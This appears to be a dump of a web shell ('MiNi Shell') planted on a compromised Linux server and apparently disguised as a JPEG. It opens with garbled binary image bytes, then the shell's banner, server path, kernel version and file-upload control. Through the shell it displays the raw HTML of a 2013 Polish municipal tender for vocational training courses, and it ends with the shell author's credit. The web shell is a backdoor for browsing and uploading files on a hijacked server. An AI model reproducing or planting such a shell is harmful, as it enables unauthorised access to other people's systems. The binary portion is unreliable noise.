JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130416/149998-N-2013.html

<p class="kh_header"><b>Potęgowo: Przeprowadzenie kursów w ramach projektu systemowego Mój wybór - aktywność</b><br>
<b>Numer ogłoszenia: 149998 - 2013; data zamieszczenia: 16.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Potęgowie , ul. Szkolna 2, 76-230 Potęgowo, woj. pomorskie, tel. 059 8115114, faks 059 8115114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopspotegowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów w ramach projektu systemowego Mój wybór - aktywność.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów dla uczestników projektu systemowego Mój wybór - aktywność, o następującej tematyce: 1)  w części I -   Kurs komputerowy,2)  w części II -  Kurs obsługi kasy fiskalnej,3)  w części III - Kurs magazyniera z obsługą wózków jezdniowych,4)  w części IV - Kurs spawacza metodą mag 135,5)  w części V -  Kurs prawa jazdy kat. B. 2. Zamawiający zapewnia zaplecze lokalowe (bez dostępu do Internetu, wyposażenia w pomoce dydaktyczne typu: rzutnik multimedialny, ekran projekcyjny itp. i bez  możliwości przechowywania wszelkiego sprzętu  poza  godzinami zajęć) oraz catering dla uczestników projektu, ponosząc koszty z tym związane - dla części I, II oraz  dla  zajęć teoretycznych w ramach części V. 3. Zamawiający dopuszcza możliwość składania ofert częściowych. Każdy z Wykonawców może złożyć jedną ofertę na dowolną liczbę części. 4. Część I - Kurs komputerowy skierowany jest do 14 uczestników projektu (w tym 3 osoby niepełnosprawne) - 1 grupa. Program kursu powinien obejmować podstawową tematykę dotyczącą umiejętności posługiwania się komputerem i Internetem tj. w szczególności: edytor tekstu Word, arkusz kalkulacyjny Excel, obsługa Internetu oraz poczty elektronicznej.
Wymiar kursu: 32 godziny zajęć tj. 8 dni roboczych - 8 spotkań po 4 godziny dziennie. Termin wykonania:  w okresie od 13.05.2013r. do 16.05.2013r. oraz od 10.06.2013r. do 13.06.2013r., w godzinach od 15.30 do 19.30, realizacja kursu w siedzibie Zamawiającego. 5. Część II -  Kurs  obsługi kasy fiskalnej  skierowany jest do 14 uczestników projektu (w tym 3 osoby niepełnosprawne) - 1 grupa. Program kursu powinien obejmować tematykę dotyczącą podstaw obsługi kasy fiskalnej, tj. w szczególności: podstawy prawne, rodzaje kas, sposoby sprzedaży, operacje kasowe, raportowanie, rozliczanie. Wymiar kursu: 8 godzin zajęć tj. 2 dni robocze - 2 spotkania po 4 godziny dziennie. Termin wykonania: w okresie od 17.06.2013r. do 18.06.2013r., w godzinach od 15.30 do 19.30, realizacja kursu w  siedzibie Zamawiającego.6. Część III -  Kurs magazyniera z obsługą wózków jezdniowych skierowany jest do 3 uczestników projektu. Program kursu powinien obejmować w szczególności: moduł: pracownik magazynowy - podstawy obsługi komputera - Word, Excel, program magazynowy Subiekt - podział dokumentów na handlowe i magazynowe, wydania magazynowe, faktury VAT i dokumenty powiązane, obsługa kasy fiskalnej, moduł: obsługa wózków jezdniowych: podział wózków jezdniowych, budowa wózka, czynności operatora przed podjęciem pracy, w czasie i po pracy wózkami, zagadnienia z zakresu ładunkoznawstwa, zagadnienia z zakresu bezpiecznego użytkowania i wymiany butli gazowych, zagadnienia z zakresu bhp. Wymiar kursu: 184 godziny zajęć, w tym: moduł: pracownik magazynowy: 50 godz. zajęć teoretycznych i  70 godzin zajęć praktycznych, moduł: obsługa wózków jezdniowych: 42 godz. zajęć teoretycznych i  22 godz. zajęć praktycznych. Termin wykonania: w okresie od 13.05.2013r. do 19.07.2013r. - realizacja poza siedzibą Zamawiającego. Kurs musi odbywać się w dni robocze, od poniedziałku do piątku w przedziale czasowym między godz. 8.00 a 16.00. Miejsce kursu: Słupsk lub Lębork. 7. Część IV -  Kurs spawacza metodą MAG 135 skierowany jest do 1 uczestnika projektu. Program kursu  powinien obejmować tematykę: procesy spawania i pokrewne spawaniu, rysunek techniczny w spawalnictwie, technologie spawania, techniki spawania, urządzenia i sprzęt do spawania, bezpieczeństwo i higiena pracy. Termin wykonania: w okresie od 13.05.2013r. do 19.07.2013r. - realizacja poza siedzibą Zamawiającego. Wymiar kursu: 146 godzin zajęć, w tym 26 godz. zajęć teoretycznych i 120 godz. zajęć praktycznych. Kurs musi odbywać się w dni robocze, od poniedziałku do piątku, w przedziale czasowym między godz. 8.00 a 16.00. Miejsce kursu: Słupsk lub Lębork. 8. Część  V -  Kurs prawa jazdy kat. B. skierowany jest do 18 uczestników, w tym 3 osoby niepełnosprawne. Program kursu: musi być zgodny z obowiązującymi przepisami i wymogami programowymi dla tego rodzaju kursu. Termin wykonania: zajęcia teoretyczne  w okresie od 19.06.2013r. do 2.07.2013r., zajęcia praktyczne w okresie od 3.07.2013r. do 20.09.2013r. Wymiar kursu: 30 godz. zajęć teoretycznych dla grupy 18 kursantów - 10 dni roboczych, tj.10 spotkań po 3 godziny dziennie w godzinach od 15.30 do 18.30, realizacja kursu w  siedzibie Zamawiającego oraz 30 godzin zajęć praktycznych (indywidualnych jazd) na terenie miasta Słupska - z każdym kursantem, zgodnie z terminarzem jazd ustalonym indywidualnie z kursantem. Kurs musi kończyć się egzaminem wewnętrznym zarówno teoretycznym jak i praktycznym. Wykonawca zobowiązany jest do przeprowadzenia badań lekarskich w celu uzyskania orzeczeń  lekarskich o braku przeciwwskazań zdrowotnych do kierowania pojazdami i pokrycia kosztów za wykonanie tych badań. Wykonawca zobowiązany jest do pokrycia pierwszej opłaty za państwowe egzaminy teoretyczne i praktyczne oraz ustalić terminy tych egzaminów dla każdego kursanta w uprawnionym Ośrodku Ruchu Drogowego. Wykonawca zobowiązany jest do zapewnienia uczestnikom kursu transportu z ich miejsca zamieszkania do miejsca odbywania szkolenia praktycznego kursu prawa jazdy kat. B i z powrotem, zgodnie z terminarzem jazd ustalonym indywidualnie z kursantem. 9. Szczegółowe wymagania dotyczące przeprowadzenia kursów:1)Godzina zajęć w ramach kursów  liczy 60 minut i obejmuje zajęcia edukacyjne, liczące 45 minut oraz przerwy liczące średnio 15 minut (1 przerwa 30 min.) - długość przerw jest ustalana w sposób elastyczny przez Wykonawcę, z zastrzeżeniem iż godzina zajęć praktycznych kursu prawa jazdy kat. B liczy 60 minut zajęć. 2)Zajęcia prowadzone muszą być przez osoby wskazane przez Wykonawcę w ofercie. Część praktyczna musi opierać się na samodzielnym wykonywaniu ćwiczeń przez uczestników kursów. 3) Wszystkie zajęcia muszą odbywać się z trenerem/wykładowcą. Nie dopuszcza się przeprowadzenia zajęć drogą elektroniczną, metodą e-learning, itp. 10. Wykonawca zobowiązany jest: 1)zapewnić dla potrzeb realizacji przedmiotowych zajęć odpowiednio wykwalifikowany personel oraz odpowiedni, adekwatny do przedmiotu kursów potencjał techniczny;2)prowadzić kursy zgodnie z obowiązującymi przepisami i wymogamiprogramowymi dla danego rodzaju kursu;3)zapewnić w trakcie trwania kursów odpowiednie warunki zgodne z przepisami bezpieczeństwa i higieny pracy;4)zapewnić uczestnikom danego kursu odzież ochronną w  przypadku konieczności wynikającej z przepisów BHP;5)ubezpieczyć uczestników szkoleń od następstw nieszczęśliwych wypadków;6)skierować  na niezbędne badania lekarskie i sfinansować ich koszt;7)wyposażyć i przekazać na własność każdemu uczestnikowi danego kursu co najmniej następujące materiały szkoleniowe zgodne z tematyką kursu: zeszyt 60-ciokartkowy formatu A5, długopis, ołówek z gumką, teczka na materiały szkoleniowe formatu A4 (z twardej laminowanej lub lakierowanej tektury albo plastiku z gumką lub rzepem do zamykania), aktualny podręcznik i/lub skrypt z zakresu danego kursu oraz inne materiały niezbędne do realizacji danego kursu. Materiały szkoleniowe powinny być przekazane uczestnikom kursu z chwilą jego rozpoczęcia. Uczestnicy kwitują odbiór materiałów własnoręcznym podpisem. Oryginał pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu danego kursu razem z innymi materiałami niezbędnymi do rozliczenia usługi;8)dostarczyć Zamawiającemu po 1 komplecie materiałów szkoleniowych z każdego kursu -  po zakończeniu danego kursu;9)sprawdzać obecność uczestników na kursach na podstawie list przygotowanych przez Zamawiającego i dostarczać oryginały tych list  Zamawiającemu -  po zakończeniu każdego z kursów;10)przeprowadzić stosowne egzaminy w ramach danego kursu zgodnie z aktualnie obowiązującymi przepisami prawa;11)przygotować i wydać  uczestnikom kursów zaświadczenia potwierdzające udział w kursach  oraz przedłożyć Zamawiającemu kopie tych dokumentów wraz z pokwitowaniem ich odbioru - po zakończeniu każdego z kursów;12)bieżąco informować Zamawiającego o okolicznościach mogących mieć wpływ na   realizację kursów, zwłaszcza w zakresie obecności na kursie osób skierowanych przez Zamawiającego, niezgłoszeniu się tych osób na kurs lub też rezygnacji z uczestnictwa w trakcie jego trwania;13)zapewnić uczestnikom kursów określonych w części III i IV drugie danie obiadowe (ziemniaki/frytki, mięso/ryba, surówka, kompot/sok) - w każdym dniu kursu. Uczestnicy kwitują odbiór posiłków własnoręcznym podpisem. Oryginał pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu danego kursu;14)oznaczać materiały szkoleniowe i wszystkie dokumentów zgodnie ze wzorem przekazanym przez Zamawiającego poprzez umieszczanie logo Unii Europejskiej i Europejskiego Funduszu Społecznego oraz informacji o środkach współfinansowania projektu;15)prowadzić dziennik zajęć dla kursów określonych w części I,II,III,IV i karty przeprowadzonych zajęć dla kursu prawa jazdy kat. B oraz przedłożyć  te dokumenty Zamawiającemu po zakończeniu każdego kursu;16)przeprowadzić wśród uczestników kursów ankiety ewaluacyjne przed rozpoczęciem i po zakończeniu każdego z kursów, a następnie przekazać oryginały wypełnionych formularzy Zamawiającemu - po zakończeniu  każdego z kursów;17)sporządzić harmonogramy działań w ramach każdego z kursów i przedłożyć je Zamawiającemu celem akceptacji najpóźniej na dwa dni przed rozpoczęciem danego kursu;18)prowadzić kursy zgodnie z przyjętymi harmonogramami.11.Zamawiający przekaże Wykonawcy plakaty dotyczące realizacji szkolenia współfinansowanego przez Unię Europejską, które winny znaleźć się w miejscu odbywania kursów. 12.Zamawiający zastrzega sobie prawo zmiany liczby osób skierowanych na dany kurs w przypadku, gdy wystąpi okoliczność, że koniecznym stanie się przeprowadzenie kursu dla mniejszej liczby osób niż wskazano w specyfikacji istotnych warunków zamówienia. W przypadku zmiany liczby uczestników kursu Wykonawcy przysługuje wynagrodzenie pomniejszone o nieponiesione koszty związane z uczestnictwem osoby (koszt ubezpieczenia, przygotowania materiałów szkoleniowych, obsługi administracyjnej kursu, jak również w przypadku zajęć indywidualnych koszty godzin zajęć, które się nie odbyły).13.Zamawiający zastrzega sobie prawo do kontroli prowadzonych kursów w trakcie ich realizacji.14.Zaleca się, aby Wykonawca, na własną odpowiedzialność i ryzyko zgromadził wszelkie informacje, które mogą być konieczne do prawidłowego przygotowania oferty i podpisania umowy. Każdy z Wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą brać udział Wykonawcy, którzy wykonali  co najmniej 2 kursy/szkolenia, których zakres jest zgodny z przedmiotem danej części zamówienia, dla grupy nie mniejszej niż 10 osób, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie; na potwierdzenie  - wykaz wykonanych usług, spełniający warunek opisany w rozdz. III pkt 4 SIWZ, zgodnych z przedmiotem danej części zamówienia z podaniem ilości osób w każdym z kursów/szkoleń,  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane - (załącznik nr 4 do SIWZ). Do wykazu Wykonawca zobowiązany jest dołączyć dowody potwierdzające, że wykazane usługi zostały wykonane należycie; ocena metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą brać udział Wykonawcy, którzy dysponują  osobami zdolnymi do przeprowadzenia kursu, tj. co najmniej 1 osobą posiadającą niezbędne wykształcenie, uprawnienia, kwalifikacje i doświadczenie zawodowe; na potwierdzenie - wykaz osób zdolnych do wykonania zamówienia, spełniających warunek opisany w rozdz. III pkt 3 SIWZ, które będą uczestniczyć w wykonywaniu danej części zamówienia, wraz z informacjami na temat ich wykształcenia, uprawnień, kwalifikacji zawodowych i doświadczenia (załącznik nr 5 do SIWZ); ocena metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnianiu warunków w postępowaniu określonych w art. 22 ust. 1 ustawy PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnieniu warunków udziału w postpowaniu określonych w art. 22 iust. 1 ustawy PZP</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy PZP przewiduje możliwość zmian w postanowieniach umowy w przypadku:1)zmiany liczby uczestników kursu będącej wynikiem powstania uzasadnionych potrzeb szkoleniowych zgłaszanych przez zainteresowane osoby, 2)zmiany osób prowadzących szkolenie, której nie można było przewidzieć w chwili zawarcia umowy, pod warunkiem, że osoba posiada odpowiednie kwalifikacje,3)zmiany terminu realizacji kursu, 4)zmiany terminu zapłaty,5)uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego,6)działań osób trzecich uniemożliwiających wykonanie usługi w terminie, które to działania nie są konsekwencją winy którejkolwiek ze stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gopspotegowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Potęgowie, ul. Szkolna 2, 76-230 Potęgowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2013 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Potęgowie, ul. Szkolna 2, 76-230 Potęgowo (pok nr 11).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia realizowany w ramach projektu  systemowego Mój wybór - aktywność współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com